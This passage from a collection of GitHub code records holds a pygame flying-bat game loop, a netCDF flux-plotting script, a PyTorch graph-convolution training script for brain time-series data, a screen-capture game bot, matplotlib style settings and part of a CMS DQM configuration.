cua ong\nchieu_cao_ong = [300,400,450] \n#Tạo màn hình kết thúc\ngame_over_surface = pygame.transform.scale2x(pygame.image.load(\"assets/Main-game.png\")).convert_alpha()\ngame_over_rect = game_over_surface.get_rect(center = (216,364))\n#chèn âm thanh\nam_thanh_dap_canh = pygame.mixer.Sound(\"sound/sfx_wing.wav\")\nam_thanh_va_cham = pygame.mixer.Sound(\"sound/sfx_hit.wav\")\nam_thanh_diem = pygame.mixer.Sound(\"sound/sfx_point.wav\")\nam_thanh_diem_countdown = 100\n# Vòng lặp while true để thực hiện game hoạt động\nwhile True:\n\n for event in pygame.event.get(): #Bắt sự kiện \n if event.type == pygame.QUIT: #Khi người chơi bấm vào nút x sẽ thoát khỏi trò chơi\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and hoat_dong_cua_tro_choi: # khi người chơi nhấn nút space bar sẽ bắt dầu chơi và bắt đâu trò chơi\n di_chuyen_cua_doi = 0\n di_chuyen_cua_doi -= 12\n am_thanh_dap_canh.play()\n if event.key == pygame.K_SPACE and hoat_dong_cua_tro_choi==False:\n hoat_dong_cua_tro_choi = True\n danh_sach_ong.clear()\n doi_hinh_chu_nhat.center = (100,300)\n di_chuyen_cua_doi = 0\n diem = 0\n if event.type == sinh_ra_ong:\n danh_sach_ong.extend(tao_ong())\n if event.type == doi_bay:\n if gia_tri_cua_doi < 2 :\n gia_tri_cua_doi += 1\n else:\n gia_tri_cua_doi = 0\n doi_hinh_chu_nhat = hoat_anh_cua_doi()\n man_hinh.blit(hinh_nen_game,(0,0))\n # btn1.draw()\n if hoat_dong_cua_tro_choi :\n # Chim di chuyển và đi qua ống\n di_chuyen_cua_doi += do_roi\n rotated_bat = xoay_doi_tuong(bat) \n doi_hinh_chu_nhat.centery += di_chuyen_cua_doi\n man_hinh.blit(rotated_bat, doi_hinh_chu_nhat)\n hoat_dong_cua_tro_choi = kiem_tra_va_cham(danh_sach_ong)\n #Của ống \n danh_sach_ong = di_chuyen_ong(danh_sach_ong)\n ve_ong(danh_sach_ong)\n #Điểm\n diem += 0.01\n hien_thi_diem(\"main game\")\n am_thanh_diem_countdown -= 100\n if am_thanh_diem_countdown <= 0:\n am_thanh_diem.play()\n am_thanh_diem_countdown = 100\n else:\n man_hinh.blit(game_over_surface,game_over_rect)\n diem_cao = cap_nhat_diem_hien_tai(diem,diem_cao)\n hien_thi_diem(\"game_over\")\n game_over = pygame.transform.scale2x(pygame.image.load(\"assets/gameover.png\"))\n # Của sàn \n san_x_pos -= 1\n ve_san()\n if san_x_pos <= -432:\n san_x_pos = 0\n \n pygame.display.update()\n clock.tick(90) # Điều khiển thời gian FPS 120 \n\n\n ","repo_name":"SideWay0101H/flappy_bat","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41616994761","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 2 15:17:41 2018\n\n@author: elynn\n\"\"\"\nfrom netCDF4 import Dataset\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(style=\"ticks\",font_scale=1.1)\ndef draw_z_grid_background(ax,zm,xmin,xmax):\n for z in range(len(zm)):\n ax.plot([xmin,xmax],[zm[z],zm[z]],color='gray',alpha=0.7,lw=0.5)\nradtyp4 = Dataset('/mnt/lab_45d1/database/Sc_group/uclales_output/archive/2xPBL_or_1km/NKX_20170511/hr_4_18_60min/NKX_20170511.ps.nc')\nradtyp2 = Dataset('/mnt/lab_45d1/database/Sc_group/uclales_output/NKX_20170511/hr_4_18_60min/NKX_20170511.ps.nc')\nthetaL_4 = radtyp4['lflxu'][:,:]-radtyp4['lflxd'][:,:]\nthetaL_2 = radtyp2['rflx']#radtyp2['lflxu'][:,:]-radtyp2['lflxd'][:,:]\ntime = radtyp2['time'][:]\nz_2 = radtyp2['zm'][:] \nz_4 = radtyp4['zm'][:]\nt_index = 1\nplt.figure(figsize=(5,8))\nax1 = plt.subplot(111)\ncolors2 = sns.cubehelix_palette(8, start=2, rot=0.05, dark=0, light=.95, reverse=True)\ndraw_z_grid_background(ax1,z_4,thetaL_2[55,:].min()-1,thetaL_4[55,:].max()+1)\nplt.plot(thetaL_2[t_index,:],z_2,'--',color='blue')\nplt.plot(thetaL_4[t_index,:],z_4,'--',color='red')\nplt.plot(thetaL_2[55,:],z_2,color='blue',label='radtype 2')\nplt.plot(thetaL_4[55,:],z_4,color='red',label='radtype 4')\nplt.legend(loc=0)\n#plt.xlim([thetaL_2[t_index,:].min()-1,310.])#thetaL_2[t_index,:].max()+1])\nplt.ylim([0,2000])\nplt.xlabel(r'Net LW radiative flux $[W/m^2]$')\n#plt.xlabel(r'$\\theta_l [K]$')\nplt.ylabel(r'z [m]')\n#plt.savefig('/mnt/lab_45d1/database/Sc_group/LES_analysis/radtyp2_vs_4/NKX_20170511_net_LW_hr6_and_hr20.png',dpi=200,bbox_inches='tight')","repo_name":"mzamora/Sc-utils","sub_path":"uclalesUtils/python/radtype2_vs_4.py","file_name":"radtype2_vs_4.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"41525370667","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nfrom tgcn.nn.gcn import gcn_pool, gcn_pool_4, ChebConv, ChebTimeConv\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport autograd.numpy as npa\nfrom load.data_hcp import load_hcp_example, FullDataset\nimport gcn.graph as graph\nimport gcn.coarsening as coarsening\nimport sklearn.metrics\nimport time, math, random, os\nimport scipy.sparse as sp\nimport configparser\nfrom util.path import get_root\n\n\nclass NetMLP(nn.Module):\n\n def __init__(self, sh):\n\n super(NetMLP, self).__init__()\n\n c = 512\n self.fc1 = torch.nn.Linear(sh, c)\n\n d = 1024\n self.fc2 = torch.nn.Linear(c, d)\n\n e= 750\n self.fc3 = nn.Linear(d, e)\n\n f=15000\n self.fc4 = nn.Linear(e, f)\n\n g = 400\n self.fc5 = nn.Linear(f, g)\n\n h = 6\n self.fc6 = nn.Linear(g, h)\n\n\n def forward(self, x):\n x = x.view(x.shape[0], -1)\n x = self.fc1(x)\n x = self.fc2(x)\n x = self.fc3(x)\n x = self.fc4(x)\n x = self.fc5(x)\n x = self.fc6(x)\n return F.log_softmax(x, dim=1)\n\n\nclass NetTGCN(torch.nn.Module):\n def __init__(self, graphs, coos):\n super(NetTGCN, self).__init__()\n\n f1, g1, k1, h1 = 1, 32, 25, 15\n self.conv1 = ChebTimeConv(f1, g1, K=k1, H=h1)\n\n self.drop1 = nn.Dropout(0.1)\n\n g2, k2 = 64, 25\n self.conv2 = ChebConv(g1, g2, K=k2)\n\n n2 = graphs[0].shape[0]\n\n c = 6#512\n self.fc1 = torch.nn.Linear(int(n2 * g2), c)\n\n #self.dense1_bn = nn.BatchNorm1d(d)\n #self.drop2 = nn.Dropout(0.5)\n\n d = 6\n self.fc2 = torch.nn.Linear(c, d)\n\n self.coos = coos\n\n def forward(self, x):\n #x = torch.tensor(npa.real(npa.fft.fft(x.to('cpu').numpy(), axis=2))).to('cuda')\n x, edge_index = x, self.coos[0].to(x.device)\n x = self.conv1(x, edge_index)\n x = F.relu(x)\n #x = gcn_pool_4(x)\n\n #x = self.drop1(x)\n\n edge_index = self.coos[0].to(x.device)\n x = self.conv2(x, edge_index)\n x = F.relu(x)\n #x = gcn_pool_4(x)\n\n x = x.view(x.shape[0], -1)\n x = self.fc1(x)\n\n #x = self.dense1_bn(x)\n #x = F.relu(x)\n #x = self.drop2(x)\n\n #x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n\n\nclass NetTGCNBasic(torch.nn.Module):\n def __init__(self, mat_size):\n super(NetTGCNBasic, self).__init__()\n\n f1, g1, k1, h1 = 1, 64, 25, 15\n self.conv1 = ChebTimeConv(f1, g1, K=k1, H=h1)\n\n n2 = mat_size\n\n c = 6\n self.fc1 = torch.nn.Linear(int(n2 * g1), c)\n\n self.coos = None\n self.perm = None\n\n def add_graph(self, coos, perm):\n self.coos = coos\n self.perm = perm\n\n def forward(self, x):\n #x = torch.tensor(npa.real(npa.fft.fft(x.to('cpu').numpy(), axis=2))).to('cuda')\n x, edge_index = x, self.coos[0]#.to(x.device)\n x = self.conv1(x, edge_index)\n\n x = F.relu(x)\n\n x = x.view(x.shape[0], -1)\n x = self.fc1(x)\n\n return F.log_softmax(x, dim=1)\n\n\ndef perm_data_time(x, indices):\n \"\"\"\n Permute data matrix, i.e. exchange node ids,\n so that binary unions form the clustering tree.\n \"\"\"\n if indices is None:\n return x\n\n N, M, Q = x.shape\n Mnew = len(indices)\n assert Mnew >= M\n xnew = np.empty((N, Mnew, Q))\n for i,j in enumerate(indices):\n # Existing vertex, i.e. real data.\n if j < M:\n xnew[:, i, :] = x[:, j, :]\n # Fake vertex because of singeltons.\n # They will stay 0 so that max pooling chooses the singelton.\n # Or -infty ?\n else:\n xnew[:, i, :] = np.zeros((N, Q))\n return xnew\n\n\ndef create_graph(device, shuffled=False):\n def grid_graph(m, corners=False):\n z = graph.grid(m)\n dist, idx = graph.distance_sklearn_metrics(z, k=number_edges, metric=metric)\n A = graph.adjacency(dist, idx)\n\n if shuffled:\n B = A.toarray()\n B = list(B[np.triu_indices(A.shape[0])])\n random.shuffle(B)\n A = np.zeros((A.shape[0], A.shape[0]))\n indices = np.triu_indices(A.shape[0])\n A[indices] = B\n A = A + A.T - np.diag(A.diagonal())\n A = sp.csr_matrix(A)\n\n # Connections are only vertical or horizontal on the grid.\n # Corner vertices are connected to 2 neightbors only.\n if corners:\n import scipy.sparse\n A = A.toarray()\n A[A < A.max() / 1.5] = 0\n A = scipy.sparse.csr_matrix(A)\n print('{} edges'.format(A.nnz))\n\n print(\"{} > {} edges\".format(A.nnz // 2, number_edges * m ** 2 // 2))\n return A\n\n number_edges= 8\n metric = 'euclidean'\n normalized_laplacian = True\n coarsening_levels = 4\n\n A = grid_graph(28, corners=False)\n #A = graph.replace_random_edges(A, 0)\n graphs, perm = coarsening.coarsen(A, levels=coarsening_levels, self_connections=False)\n return graphs, perm\n\n\ndef load_hcp_tcgn(device):\n\n time_series, labels, As = load_hcp_example(full=True)\n\n normalized_laplacian = True\n coarsening_levels = 4\n shuffled=False\n\n A = As[0]\n #A = arr.todense()\n\n if shuffled:\n B = A.toarray()\n B = list(B[np.triu_indices(A.shape[0])])\n random.shuffle(B)\n A = np.zeros((A.shape[0], A.shape[0]))\n indices = np.triu_indices(A.shape[0])\n A[indices] = B\n A = A + A.T - np.diag(A.diagonal())\n A = sp.csr_matrix(A)\n graphs, perm = coarsening.coarsen(A, levels=coarsening_levels, self_connections=False)\n #else:\n W = sp.random(As[0].shape[0], As[0].shape[0], density=0, format='csr',\n data_rvs=lambda s: np.random.uniform(0, 1, size=s))\n\n #graphs, perm = coarsening.coarsen(W, levels=coarsening_levels, self_connections=False)\n #graphs = [As[0]]\n graphs = [W]\n\n coos = [torch.tensor([graph.tocoo().row, graph.tocoo().col], dtype=torch.long).to(device) for graph in graphs]\n\n idx_train = range(int(0.8*time_series.shape[0]))\n print('Size of train set: {}'.format(len(idx_train)))\n\n idx_test = range(len(idx_train), time_series.shape[0])\n print('Size of test set: {}'.format(len(idx_test)))\n\n train_data = time_series[idx_train]\n train_labels = labels[idx_train]\n test_data = time_series[idx_test]\n test_labels = labels[idx_test]\n\n #train_data = perm_data_time(train_data, perm)\n #test_data = perm_data_time(test_data, perm)\n\n return graphs, coos, train_data, test_data, train_labels, test_labels\n\n\ndef train(args, model, device, train_loader, optimizer, epoch, verbose=False):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n target = torch.argmax(target, dim=1)\n k = 1.\n w = torch.tensor([1., k, k, k, k, k]).to(device)\n loss = F.nll_loss(output, target, weight=w)\n for p in model.named_parameters():\n if p[0].split('.')[0][:2] == 'fc':\n loss = loss + args.reg_weight*(p[1]**2).sum()\n loss.backward()\n optimizer.step()\n if verbose:\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n\ndef train_minibatch(args, model, device, train_loader, optimizer, epoch, verbose=False):\n train_loss = 0\n model.train()\n minibatch = 10\n for batch_idx, (data, target, coos, perm) in enumerate(train_loader):\n #data, target = data.to(device), target.to(device)\n #F = 1024 ** 2\n #print('Bytes of Data: {:1.4f} MB.'.format(getsizeof(data) / F))\n coos = [c[0].to(device) for c in coos]\n #ctr = 0\n target = target.to(device)\n temp_loss = 0\n model.module.add_graph(coos, perm)\n\n for i in range(len(data)):\n optimizer.zero_grad()\n output = model(data[i].to(device))\n expected = torch.argmax(target[:, i], dim=1)\n k = 1.\n w = torch.tensor([1., k, k, k, k, k]).to(device)\n loss = F.nll_loss(output, expected, weight=w)\n\n loss = loss / minibatch\n\n train_loss += loss\n temp_loss += loss\n for p in model.named_parameters():\n if p[0].split('.')[0][:2] == 'fc':\n loss = loss + args.reg_weight*(p[1]**2).sum()\n\n loss.backward()\n\n if batch_idx % minibatch == 0:\n optimizer.step()\n\n #ctr += 1\n\n if verbose:\n #if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx, len(train_loader.dataset),\n 100. * batch_idx / len(train_loader.dataset), temp_loss.item()))\n\n train_loss /= (len(train_loader.dataset) * len(data))\n return train_loss\n\n\ndef test(args, model, device, test_loader, t1, epoch):\n model.eval()\n test_loss = 0\n correct = 0\n preds = torch.empty(0, dtype=torch.long).to(device)\n targets = torch.empty(0, dtype=torch.long).to(device)\n with torch.no_grad():\n for data_t, target_t, coos, perm in test_loader:\n coos = [c[0].to(device) for c in coos]\n #data = data_t[0].to(device)\n target = target_t.to(device)\n\n model.module.add_graph(coos, perm)\n for i in range(len(data_t)):\n output = model(data_t[i].to(device))\n expected = torch.argmax(target[:, i], dim=1)\n test_loss += F.nll_loss(output, expected, reduction='sum').item()\n pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n preds = torch.cat((pred, preds))\n targets = torch.cat((expected, targets))\n correct += pred.eq(expected.view_as(pred)).sum().item()\n\n #output = model(data)\n #target = torch.argmax(target, dim=1)\n #test_loss += F.nll_loss(output, expected, reduction='sum').item() # sum up batch loss\n\n\n test_loss /= (len(test_loader.dataset) * len(data_t))\n\n # print('Test Epoch: {} Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)'.format(\n # epoch, test_loss, correct, len(test_loader.dataset),\n # 100. * correct / len(test_loader.dataset)))\n\n return test_loss, correct\n #print(sklearn.metrics.classification_report(targets.to('cpu').numpy(), preds.to('cpu').numpy()))\n\n\nclass Dataset(torch.utils.data.Dataset):\n 'Characterizes a dataset for PyTorch'\n def __init__(self, images, labels):\n 'Initialization'\n self.labels = labels\n self.images = images\n\n def __len__(self):\n 'Denotes the total number of samples'\n return len(self.images)\n\n def __getitem__(self, index):\n 'Generates one sample of data'\n # Select sample\n # X = torch.tensor(self.images[index], dtype=torch.float)\n X = self.images[index].astype('float32')\n # Load data and get label\n y = self.labels[index].astype('float32')\n\n return X, y\n\n\ndef seed_everything(seed=1234):\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef decode(y_hat, H, Gp, Gn):\n T = len(y_hat)\n N = T + H - 1\n y_decoded = [0] * N\n i = 0\n\n while (i < T - 3):\n num_agree = ((int(y_hat[i] == y_hat[i + 1] != 0)) +\n (int(y_hat[i] == y_hat[i + 2] != 0)) +\n (int(y_hat[i] == y_hat[i + 3] != 0)))\n if (num_agree > 1):\n y_decoded[i + Gn] = y_hat[i]\n i += H\n else:\n i += 1\n return np.array(y_decoded)\n\n\ndef holdout_delabeled(model, data):\n H = 12\n y_holdout = model(data)\n y_holdout = np.reshape(y_holdout, (20, 284 - H + 1))\n\n num_patients = y_holdout.shape[0]\n y_decoded = np.zeros((num_patients, 284))\n Gp, Gn = 4, 4\n for i in range(y_holdout.shape[0]):\n y_decoded[i, :] = decode(y_holdout[i, :], H, Gp, Gn)\n\n return y_decoded\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--batch-size', type=int, default=1, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--epochs', type=int, default=50, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.001, metavar='LR',\n help='learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.5, metavar='M',\n help='SGD momentum (default: 0.5)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n\n parser.add_argument('--save-model', action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n\n args.reg_weight = 5.e-4\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n #device = torch.device(\"cpu\")\n\n normalized_laplacian = True\n coarsening_levels = 4\n\n settings = configparser.ConfigParser()\n settings_dir = os.path.join(get_root(), 'load/res/hcp_loader.ini')\n settings.read(settings_dir)\n\n\n # kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n data_type = 'aparc'\n if data_type == 'dense':\n mat_size = 59412\n else:\n mat_size = 148\n\n train_set = FullDataset(device, settings, data_type, test=False)\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=False)\n\n test_set = FullDataset(device, settings, data_type, test=True)\n test_loader = torch.utils.data.DataLoader(test_set, batch_size=args.batch_size, shuffle=False)\n\n model = NetTGCNBasic(mat_size)\n #model = NetMLP(int(graphs[0].shape[0] * 15))\n\n if torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model.to(device)\n\n pytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(pytorch_total_params)\n\n #optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.95)\n for epoch in range(1, args.epochs + 1):\n t1 = time.time()\n train_loss = train_minibatch(args, model, device, train_loader, optimizer, epoch, verbose=True)\n scheduler.step()\n test_loss, correct = test(args, model, device, test_loader, t1, epoch)\n\n print('Epoch: {} Training loss: {:1.3e}, Test loss: {:1.3e}, Accuracy: {}/{} ({:.2f}%)'.format(\n epoch, train_loss, test_loss, correct, len(test_loader.dataset) * 270,\n 100. * correct / (len(test_loader.dataset) * 270)))\n\n if args.save_model:\n torch.save(model.state_dict(), \"hcp_cnn_1gpu2.pt\")\n\n\nif __name__ == '__main__':\n seed_everything(76)\n main()\n\n\n\n","repo_name":"cassianobecker/tgcn","sub_path":"examples/pytorch_geo_based/pygeo_hcp.py","file_name":"pygeo_hcp.py","file_ext":"py","file_size_in_byte":16113,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"36722714604","text":"import os\nimport time\nimport cv2\nimport mss\nimport numpy as np\nimport pynput\nfrom pynput.keyboard import Key\nimport pytesseract\n# from keras.models import Sequential, load_model\n\n\nkeys_pressed = {\n \"Key.up\": False,\n \"Key.left\": False,\n \"Key.right\": False,\n}\n\nrun = True\n\n\ndef main():\n print(\"AI ON\")\n keyboard_controller = pynput.keyboard.Controller()\n mouse_controller = pynput.mouse.Controller()\n\n # listen for key presses\n\n def on_press(key):\n # print(\"\\nkey pressed\", key, end=\"\\n\\n\")\n\n if key == Key.esc:\n print(\"esc pressed\")\n listener.stop()\n global run\n run = False\n return False\n\n for key_from_dict in keys_pressed:\n if key_from_dict == str(key):\n keys_pressed[key_from_dict] = True\n\n def on_release(key):\n # print(\"\\nkey released\", key, end=\"\\n\")\n\n for key_from_dict in keys_pressed:\n if key_from_dict == str(key):\n keys_pressed[key_from_dict] = False\n\n listener = pynput.keyboard.Listener(\n on_press=on_press,\n on_release=on_release)\n listener.start()\n\n # main loop\n millis_old = time.time()\n i = 0\n\n predictions = [\n \"left\", \"left_up\", \"noop\", \"right\", \"right_up\", \"up\"\n ]\n\n # model = load_model(\"model_v4.h5\")\n image_resolution = 256\n\n left_light_image = cv2.imread(\"light_small.png\")\n\n fps = 0\n fps_alpha = 0.9\n\n with mss.mss() as sct:\n monitor_1024 = {\"top\": -1050, \"left\": 1300, \"width\": 1024, \"height\": 1024}\n monitor_full = {\"top\": -1080, \"left\": 860, \"width\": 1920, \"height\": 1080}\n monitor_score = {\"top\": -1040, \"left\": 930, \"width\": 350, \"height\": 85}\n score = 0\n\n image = None\n alive = False\n # get current date with milliseconds\n run_name = time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.localtime())\n print(\"run_name\", run_name)\n # create folder for this run\n os.mkdir(\"detection/\" + run_name)\n while run:\n elapsed = time.time() - millis_old\n millis_old = time.time()\n\n # mouse position\n # print(\"mouse position\", mouse_controller.position, elapsed, end=\"\\r\")\n\n # if (i % 2 == 0):\n # keyboard_controller.press(Key.up)\n # keyboard_controller.press(Key.left)\n\n # else:\n # keyboard_controller.release(Key.up)\n # keyboard_controller.release(Key.left)\n\n # if i > 0:\n # name = \"training/\"\n # if (keys_pressed[\"Key.left\"]):\n # name += \"left\"\n # if (keys_pressed[\"Key.up\"]):\n # name += \"_up\"\n # elif (keys_pressed[\"Key.right\"]):\n # name += \"right\"\n # if (keys_pressed[\"Key.up\"]):\n # name += \"_up\"\n # elif (keys_pressed[\"Key.up\"]):\n # name += \"up\"\n # else:\n # name += \"noop\"\n # name += \"/\" + str(random.randint(0, 100000000000000000)) + \".png\"\n # cv2.imwrite(name, image)\n\n image = np.array(sct.grab(monitor_full))\n # cv2.imwrite(\"last.png\", image)\n # image = np.array(\n\n # sct.shot(mon=2, output=\"last.png\")\n\n # cv2.imshow(\"image\", image)\n # cv2.waitKey(1)\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n # # get average color rgb\n # area_for_average_color = image[100:200, 100:200]\n # average_color = np.average(area_for_average_color, axis=(0, 1))\n # average_color_rgb = [average_color[2], average_color[1], average_color[0]]\n\n # dead_color_rgb = [187, 132, 255]\n # alive_color_rgb = [47, 100, 83]\n\n # if np.allclose(average_color_rgb, dead_color_rgb, atol=20):\n # alive = False\n # # time.sleep(1)\n\n # if np.allclose(average_color_rgb, alive_color_rgb, atol=20):\n # alive = True\n\n # get location of left light\n # light_location_result = cv2.matchTemplate(image, left_light_image, cv2.TM_SQDIFF_NORMED)\n # _, _, light_loc_top_left, _ = cv2.minMaxLoc(light_location_result)\n # light_bottom_right = (light_loc_top_left[0] + left_light_image.shape[1], light_loc_top_left[1] + left_light_image.shape[0])\n # cv2.rectangle(image, light_loc_top_left, light_bottom_right, 255, 2)\n\n # cv2.imshow(\"image\", image)\n # cv2.waitKey(1)\n\n # # move mouse to light slowly\n # light_pos_screen = (light_loc_top_left[0] + 1300, light_loc_top_left[1] - 1050)\n # # mouse_controller.position = light_pos_screen\n # mouse_controller.move(light_pos_screen[0] - mouse_controller.position[0], light_pos_screen[1] - mouse_controller.position[1])\n\n # cv2.imwrite(\"detection/\" + run_name + \"/\" + run_name + str(i) + \".png\", image)\n\n # text = pytesseract.image_to_string(image)\n # text_clean = text.replace(\"\\n\", \"\")\n # text_clean = text_clean.replace(\" \", \"\")\n # # keep only numbers\n # text_clean = ''.join(filter(str.isdigit, text_clean))\n # if text_clean != \"\":\n # new_score = int(text_clean)\n # if new_score > score:\n # if score < 1_000_000:\n # score = new_score\n fps = (1 / elapsed) * (1 - fps_alpha) + fps * fps_alpha\n\n print(\"time: \", format(elapsed, \".3f\"), \"s\", \"fps: \", format(fps, \".0f\"), end=\"\\n\\n\")\n\n # image = cv2.resize(image, (image_resolution, image_resolution))\n # image = np.array(image)\n # image = image.reshape(1, image_resolution, image_resolution, 3)\n # image = image / 255\n # millis_after_image_processing = time.time()\n\n # prediction = model.predict(image, verbose=0)\n # millis_after_prediction = time.time()\n # prediction_text = predictions[np.argmax(prediction)]\n\n # print(\"AI input: \", prediction_text, \" \", end=\"\\r\")\n\n # if prediction_text == \"left\":\n # keyboard_controller.press(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.right)\n # keyboard_controller.release(keyboard_controller._Key.up)\n # elif prediction_text == \"left_up\":\n # keyboard_controller.press(keyboard_controller._Key.left)\n # keyboard_controller.press(keyboard_controller._Key.up)\n # keyboard_controller.release(keyboard_controller._Key.right)\n # elif prediction_text == \"noop\":\n # keyboard_controller.release(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.right)\n # keyboard_controller.release(keyboard_controller._Key.up)\n # elif prediction_text == \"right\":\n # keyboard_controller.press(keyboard_controller._Key.right)\n # keyboard_controller.release(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.up)\n # elif prediction_text == \"right_up\":\n # keyboard_controller.press(keyboard_controller._Key.right)\n # keyboard_controller.press(keyboard_controller._Key.up)\n # keyboard_controller.release(keyboard_controller._Key.left)\n # elif prediction_text == \"up\":\n # keyboard_controller.press(keyboard_controller._Key.up)\n # keyboard_controller.release(keyboard_controller._Key.left)\n # keyboard_controller.release(keyboard_controller._Key.right)\n\n # time.sleep(0.01)\n i += 1\n\n # exit\n cv2.destroyAllWindows()\n sct.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"turcottep/run_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74011575615","text":"import os, sys\nimport numpy as np\nimport matplotlib.pylab as plt\nroot_dir = os.path.dirname(os.getcwd()) + '/'\nsubDirectories = [x[0] for x in os.walk(root_dir)]\nsys.path.extend(subDirectories)\nfrom tools import *\n\nimport matplotlib\nmatplotlib.font_manager.findSystemFonts(fontpaths=['/home/bruno/fonts/Helvetica'], fontext='ttf')\nmatplotlib.rcParams['font.sans-serif'] = \"Helvetica\"\nmatplotlib.rcParams['font.family'] = \"sans-serif\"\nmatplotlib.rcParams['mathtext.fontset'] = 'cm'\nmatplotlib.rcParams['mathtext.rm'] = 'serif'\n\nlegendsize = 12\nif system == 'Tornado': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Eagle': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'xps': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Lux': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/brvillas/fonts', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Shamrock': prop = matplotlib.font_manager.FontProperties( fname=os.path.join('/home/bruno/fonts/Helvetica', \"Helvetica.ttf\"), size=legendsize)\nif system == 'Mac_mini': prop = None\nif system == 'MacBook': prop = None\n\nfigure_width = 8\nborder_width = 1\n\ntick_size_major, tick_size_minor = 5, 3\ntick_label_size_major, tick_label_size_minor = 11, 10\ntick_width_major, tick_width_minor = 1.5, 1\nlabel_size = 12\nlegend_size = 9\n\n\n# Font Sizes\nfontsize_label = 16","repo_name":"bvillasen/cosmo_simulations","sub_path":"plot_functions/figure_functions.py","file_name":"figure_functions.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32610194280","text":"import FWCore.ParameterSet.Config as cms\n\nfrom PhysicsTools.NanoAOD.nanoDQM_cfi import nanoDQM\n\nnanoDQMMC = nanoDQM.clone()\nnanoDQMMC.vplots.Electron.sels.Prompt = cms.string(\"genPartFlav == 1\")\nnanoDQMMC.vplots.Muon.sels.Prompt = cms.string(\"genPartFlav == 1\")\nnanoDQMMC.vplots.Photon.sels.Prompt = cms.string(\"genPartFlav == 1\")\nnanoDQMMC.vplots.Tau.sels.Prompt = cms.string(\"genPartFlav == 5\")\nnanoDQMMC.vplots.Jet.sels.Prompt = cms.string(\"genJetIdx != 1\")\nnanoDQMMC.vplots.Jet.sels.PromptB = cms.string(\"genJetIdx != 1 && hadronFlavour == 5\")\n\nnanoDQMQTester = cms.EDAnalyzer(\"QualityTester\",\n qtList = cms.untracked.FileInPath('PhysicsTools/NanoAOD/test/dqmQualityTests.xml'),\n prescaleFactor = cms.untracked.int32(1), \n testInEventloop = cms.untracked.bool(False),\n qtestOnEndLumi = cms.untracked.bool(False),\n verboseQT = cms.untracked.bool(True)\n)\n\nnanoHarvest = cms.Sequence( nanoDQMQTester 